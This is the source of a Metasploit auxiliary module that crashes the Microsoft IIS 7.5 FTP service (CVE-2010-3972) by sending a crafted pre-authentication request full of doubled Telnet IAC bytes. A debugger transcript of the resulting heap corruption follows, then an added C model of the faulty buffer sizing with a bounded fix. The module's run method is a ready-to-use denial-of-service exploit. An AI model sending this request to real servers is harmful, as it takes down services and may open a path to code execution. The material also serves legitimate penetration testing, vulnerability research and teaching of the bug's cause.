GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft IIS FTP Server Encoded Response Overflow Trigger',
        'Description' => %q{
          This module triggers a heap overflow when processing a specially crafted
          FTP request containing Telnet IAC (0xff) bytes. When constructing the response,
          the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.

          This issue can be triggered pre-auth and may in fact be exploitable for
          remote code execution.
        },
        'Author' => [
          'Matthew Bergin', # Original discovery/disclosure
          'jduck' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-3972' ],
          [ 'OSVDB', '70167' ],
          [ 'BID', '45542' ],
          [ 'MSB', 'MS11-004' ],
          [ 'EDB', '15803' ],
          [ 'URL', 'https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/' ]
        ],
        'DisclosureDate' => '2010-12-21',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21)
      ]
    )
  end

  def run
    connect

    # Read the 220 greeting (up to 10 s) so the crash can be correlated with a version string.
    banner = sock.get_once(-1, 10)
    print_status("banner: #{banner.to_s.strip}")

    # 1024 bytes of cyclic pattern; any value that lands in a register can be
    # mapped back to an offset with pattern_offset.
    buf = Rex::Text.pattern_create(1024)

    # the 0xff's must be doubled, the server will un-and-re-double them.
    ffs = "\xff" * (0x7e * 2)

    # Continuing after the first exception sometimes leads to this being dereferenced.
    buf[0, 3] = [0xdeadbe00].pack('V')[1, 3]

    # Place the doubled IAC run at offset 4 and terminate the command line.
    buf[4, ffs.length] = ffs
    buf << "\r\n"

    sock.put(buf)

    disconnect
  rescue ::Rex::ConnectionError => e
    vprint_error(e.message)
  end
end

=begin

This transcript is from a vulnerable Win7 machine:

Processing initial command '$<script.wdbg'
0:012> $<script.wdbg
0:012> bp ftpsvc+3f360 ".printf \"buf @ 0x%x, len: 0x%x (end: 0x%x)\\n\", eax, ecx, (eax+ecx);g"
0:012> bp ftpsvc+3f382 ".printf \"extra len: 0x%x\\n\", edi;g"
0:012> bp ftpsvc+3f395 ".printf \"(0x%x+0x%x) 0x%x > (0x%x-0x%x) 0x%x ??\\n\", ecx, edi, ebx, poi(esi+14), poi(esi+8), edx;g"
0:012> bp ftpsvc+3f397
0:012> bp ftpsvc+3f39f "r @$t0 = ecx;g"
0:012> bp ftpsvc+3f3a4 ".printf \"allocated 0x%x bytes at 0x%x (end: 0x%x)\\n\", @$t0, eax, (eax+@$t0);g"
0:012> *bp ftpsvc+3f3c0 ".printf \"writing 0xff to 0x%x\\n\", eax;g"
0:012> *bp ftpsvc+3f3c6 ".printf \"writing 0x%x to 0x%x\\n\", (edx & 0xff), eax;g"
0:012> g
buf @ 0x97f81c, len: 0x1b (end: 0x97f837)
extra len: 0x0
buf @ 0x3e4ca0, len: 0x3a4 (end: 0x3e5044)
extra len: 0x7e
(0x3a4+0x7e) 0x422 > (0x422-0x0) 0x422 ??
Breakpoint 3 hit
eax=003e4ca0 ebx=00000422 ecx=000003a4 edx=00000422 esi=00dcfaf8 edi=0000007e
eip=6c63f397 esp=00dcfaac ebp=00dcfac0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ftpsvc!TELNET_STREAM_CONTEXT::OnSendData+0x49:
6c63f397 8b7df8 mov edi,dword ptr [ebp-8] ss:0023:00dcfab8=00000000
0:007> g
(2f8.a40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003e50d0 ebx=00000000 ecx=ffffffff edx=003e4898 esi=003e4890 edi=002f0000
eip=778f30d7 esp=00dcf990 ebp=00dcfa70 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
ntdll!RtlpFreeHeap+0x4d6:
778f30d7 8b19 mov ebx,dword ptr [ecx] ds:0023:ffffffff=????????
0:007> g
(2f8.a40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003e4898 ebx=003e4c98 ecx=deadbe27 edx=ffffff41 esi=003e4890 edi=002f0000
eip=778f6030 esp=00dcf950 ebp=00dcf978 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpCoalesceFreeBlocks+0x268:
778f6030 8b4904 mov ecx,dword ptr [ecx+4] ds:0023:deadbe2b=????????

=end
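The mechanism the module's comment describes (the server un-doubles IAC IAC on input, then re-doubles every 0xff when it echoes the command back in its reply) is easiest to see in a small model of the escaping on both sides. The following C is an added illustration written for this page; it is not the module's code and not ftpsvc's code. It assumes, as a model only, that the reply buffer is sized from the stored (un-doubled) command length rather than from the re-escaped length; the page does not show how ftpsvc actually computes the capacity checked at ftpsvc+3f395. The reply prefix "500 '" and the 'A' filler standing in for the cyclic pattern are constructed. What the model does reproduce from the transcript is the shortfall: the 0x7e*2 IAC bytes sent collapse to 0x7e stored bytes, and re-doubling them needs exactly the "extra len: 0x7e" the breakpoint prints.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IAC 0xff   /* Telnet "Interpret As Command" byte */

/* The line the module sends, minus the trailing CRLF: constructed stand-in,
 * with 'A' filler instead of the cyclic pattern, 0xbe 0xad 0xde at the
 * start, and 0x7e*2 doubled IAC bytes starting at offset 4. */
size_t build_module_request(uint8_t *out, size_t cap)
{
    const size_t len = 1024;
    if (cap < len) return 0;
    memset(out, 'A', len);
    out[0] = 0xbe; out[1] = 0xad; out[2] = 0xde;  /* [0xdeadbe00].pack('V')[1, 3] */
    memset(out + 4, IAC, 0x7e * 2);
    return len;
}

/* Receiver side: collapse each IAC IAC pair to a single 0xff byte.
 * Returns bytes written to out (out needs at most len bytes). */
size_t telnet_unescape(const uint8_t *in, size_t len, uint8_t *out)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        out[o++] = in[i];
        if (in[i] == IAC && i + 1 < len && in[i + 1] == IAC)
            i++;                      /* drop the second byte of the pair */
    }
    return o;
}

/* Sender side: every 0xff in the payload goes on the wire as IAC IAC. */
size_t telnet_escaped_len(const uint8_t *in, size_t len)
{
    size_t n = len;
    for (size_t i = 0; i < len; i++)
        if (in[i] == IAC) n++;
    return n;
}

/* Bounded re-escape: never writes past cap, returns the bytes needed, so a
 * caller can tell that an unchecked copy would have run off the end. */
size_t telnet_escape(const uint8_t *in, size_t len, uint8_t *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        size_t need = (in[i] == IAC) ? 2 : 1;
        if (o + need <= cap) {
            out[o] = in[i];
            if (need == 2) out[o + 1] = IAC;
        }
        o += need;
    }
    return o;
}

struct reply { uint8_t *buf; size_t cap; size_t needed; };

/* Builds "<prefix><re-escaped cmd>\r\n" in a heap buffer.
 * size_from_escaped == 0 models the flaw (assumed form): capacity comes from
 * the stored, un-doubled length, so each 0xff that must be doubled on output
 * is one byte the reply has no room for. Returns 1 if it fits, 0 if an
 * unchecked copy would have overflowed by (needed - cap) 0xff bytes, -1 on OOM. */
int build_reply(const char *prefix, const uint8_t *cmd, size_t cmd_len,
                int size_from_escaped, struct reply *r)
{
    size_t plen = strlen(prefix);
    size_t body = size_from_escaped ? telnet_escaped_len(cmd, cmd_len) : cmd_len;

    r->cap = plen + body + 2;
    r->buf = malloc(r->cap);
    if (!r->buf) return -1;

    memcpy(r->buf, prefix, plen);
    size_t esc = telnet_escape(cmd, cmd_len, r->buf + plen, r->cap - plen);
    r->needed = plen + esc + 2;
    if (r->needed > r->cap) return 0;
    memcpy(r->buf + plen + esc, "\r\n", 2);
    return 1;
}

int main(void)
{
    uint8_t req[1024], cmd[1024];
    size_t rl = build_module_request(req, sizeof req);
    size_t cl = telnet_unescape(req, rl, cmd);
    printf("wire %zu bytes -> stored %zu bytes -> re-escaped %zu bytes\n",
           rl, cl, telnet_escaped_len(cmd, cl));

    struct reply r;
    int ok = build_reply("500 '", cmd, cl, 0, &r);
    printf("flawed sizing:  cap 0x%zx needed 0x%zx -> %s by 0x%zx\n",
           r.cap, r.needed, ok ? "fits" : "overflows", r.needed - r.cap);
    free(r.buf);

    ok = build_reply("500 '", cmd, cl, 1, &r);
    printf("correct sizing: cap 0x%zx needed 0x%zx -> %s\n",
           r.cap, r.needed, ok ? "fits" : "overflows");
    free(r.buf);
    return 0;
}
```

The point of the bounded writer is the fix pattern: size the output from the escaped length (or let the writer report how many bytes it needed, snprintf-style, and grow before copying) rather than from the length of the bytes you stored after un-escaping. The shortfall the model reports, 0x7e bytes, is the same count the transcript shows as "extra len" just before the heap metadata corruption surfaces in RtlpFreeHeap and RtlpCoalesceFreeBlocks.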